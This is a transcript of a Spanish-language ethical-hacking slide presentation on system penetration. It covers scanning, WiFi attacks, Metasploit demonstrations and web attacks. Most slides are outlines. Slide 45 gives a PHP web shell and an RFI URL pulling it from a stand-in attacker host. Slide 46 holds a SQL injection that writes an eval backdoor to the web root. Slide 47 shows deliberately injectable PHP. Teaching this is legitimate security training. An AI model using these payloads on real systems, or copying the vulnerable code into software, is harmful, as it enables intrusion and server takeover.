1 / 55

Técnicas avanzadas de penetración a sistemas

Técnicas avanzadas de penetración a sistemas. Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU. HACKING ETICO. Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking con fines

varian
Télécharger la présentation

Técnicas avanzadas de penetración a sistemas

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Técnicas avanzadas de penetración a sistemas Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU

  2. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking con fines defensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.

  3. QUE ES UN HACKER Experto en algún campo de la informática Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.

  4. Reconocimiento • Pasivo • Activo • Rastreo (escaner) • Acceso • Niveles del Sistema • Redes • DOS • Mantener el acceso • Borrado de huellas Pasos previos alATAQUE

  5. FOOTPRINTING Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting). El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.

  6. FOOTPRINTING 1.- Obtener información inicial • whois • nslookup 2.- Localizar el rango de red • Traceroute

  7. 8.-Inyecciones SQL 9.-R.F.I 10.-XSS 11.-Inyeccion de comandos arbitrarios 12.-Hijacking 13.-Cookie poisoning TIPOS DE ATAQUES 1.- Hacking WIFI 2.-DOS 3.-DDOS 4.-M.I.T 5.- Envenenamiento DNS 6.-Reverse Shell 7.-Port scaning

  8. Hacking Wifi

  9. Definiciones ·BSSID ·IVS ·SSID ·Mode monitor ·AP ·WEP ·STATION ·WPA ·DOS

  10. Que Ataques analizaremos? ·Hacking WEP ·Fake AP ·Wifi DOS (A usuarios y sobre saturación de frecuencias)

  11. Fake Ap método De Ataque y contra Ataque

  12. DOS (Denial of service) En redes Wifi *Sobre saturacion de Frecuencias *Des-autentificacion infinita de usuarios

  13. Detección y Análisis Wardriving

  14. Escaneo de Puertos El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal. Nos permite : Explorar Identificar Comprender

  15. Tipo de escaneo Otros Medio abierto Barridos Técnicas Abierto Silencioso UDP scan TCP connect () TCP SYN TCP FIN TCP echo FTP bounce scan Reverse Ident Zombie scan ACK Scan UDP echo Null Scan TCP ACK TCP SYN Xmas Scan ICMP echo SYN/ACK Scan Fragmentación TCP

  16. TCP connect() La mas común de cualquier software de escaneo de puertos consiste en usar la llamada connect() de TCP Intenta establecer conexión Si conecta el puerto esta abierto si no , el puerto esta cerrado Si no contesta esta silencioso Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones *Logs

  17. ComportamientoTCP connect() Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED Hacker------[SYN]-------[*] Puerto TCP Victima SILENT

  18. TCP SYN Técnica conocida como Half-open scan, escaneo medio abierto por excelencia se envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión *Discreto *Excelentes resultados

  19. ComportamientoTCP SYN Hacker ---[SYN]---> [O] P. TCP abierto en la Victima Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima Hacker ---[RST]---> [O] P. TCP abierto en la Victima Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima

  20. ACK scan Destinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no. Envía paquetes ACK con números de secuencia y confirmación aleatorios. si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suya si el puerto esta cerrado responderá RST pero si no responde es que esta filtrado. * Apoyo de un escaneo anterior *Variable del ping si responde RST esta vivo si no es in alcanzable. *Identificar firewall bloqueando SYN.

  21. ComportamientoACK scan Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima

  22. Null scan Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso. Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.

  23. ComportamientoNull scan Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima local ---[ ]---> [X] Puerto TCP cerrado en la Victima Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima

  24. La razón

  25. POC Analizar 2 tipos de escaneo con la intención de evadir un firewall y obtener información acerca de los puertos abiertos.

  26. DNS cache poisoning ARP Poisoning Phishing Ataques MIT

  27. EXPLOTACION

  28. Escáner de vulnerabilidades

  29. Escáner de vulnerabilidades

  30. EXPLOTACION

  31. MetasploitWindows Server 2003

  32. Puerto 445 ms08067 Crear usuario Habilitar Escritorio Remoto Cambiar la contraseña del Administrador PenetraciónWindows Server 2003prueba de concepto OBJETIVO Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.

  33. MetasploitWindows Server 2008 R2

  34. MetasploitWindows Server 2008 R2 • Numero de vulnerabilidad : ms09050 • Encontrar el servidor verificando versión de smb • Explotar la vulnerabilidad • Denegación de servicios. OBJETIVO Mostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.

  35. MetasploitWindows XP SP3

  36. MetasploitPenetración a Windows XP SP3 Prueba de concepto Encontrar la victima verificando versión de SMB Lograr la obtención de una reverse shell Habilitar el uso de escritorio remoto Inyectar la conexión a escritorio remoto OBJETIVO Mostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.

  37. MetasploitWindows 7

  38. MetasploitWindows 7 PenetraciónPrueba de concepto Usar INGENIERIA SOCIAL Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL Vulnerar navegador web. UPLOAD MI PATH C:\DESTINO\\Downloads OBJETIVO Mostrar el ataque de penetración a windows 7 en un ambiente controlado.

  39. Ataques WEB

  40. Analicemos la vulnerabilidad de xss Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador Ataques XSS

  41. Ataques XSS

  42. Ataques XSS

  43. Ataques XSS

  44. vulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto. RFI se aprovecha del uso irresponsable de las funciones include y requiere, las cuales, debido al limitado conocimiento del programador y las pocas o nulas validaciones que realiza antes de incluir una variable recibida por parametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scripts programados para explotar dicha vulnerabilidad. Ataques RFIRemotefileinclusion

  45. http://www.victima.com/index.php?nav=pagina1php http://www.victimacom/index.php?nav=pagina2.php Ataques RFIRemotefileinclusion <?php printsystem($_GET['command']); ?> http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls

  46. Inyeccion SQL union all select "<?phpeval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"

  47. <?php$link = mysql_connect('127.0.0.1','root', 'pass');mysql_select_db('ejemplo', $link);$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);if(mysql_errno($link)){ echo mysql_error($link);exit;}while($row = mysql_fetch_assoc($sql)){ echo $row['id']."".$row['titulo']."".$row['contenido']."".$row['parent'];}?> Analicemos este código

  48. Busqueda de tablas.

More Related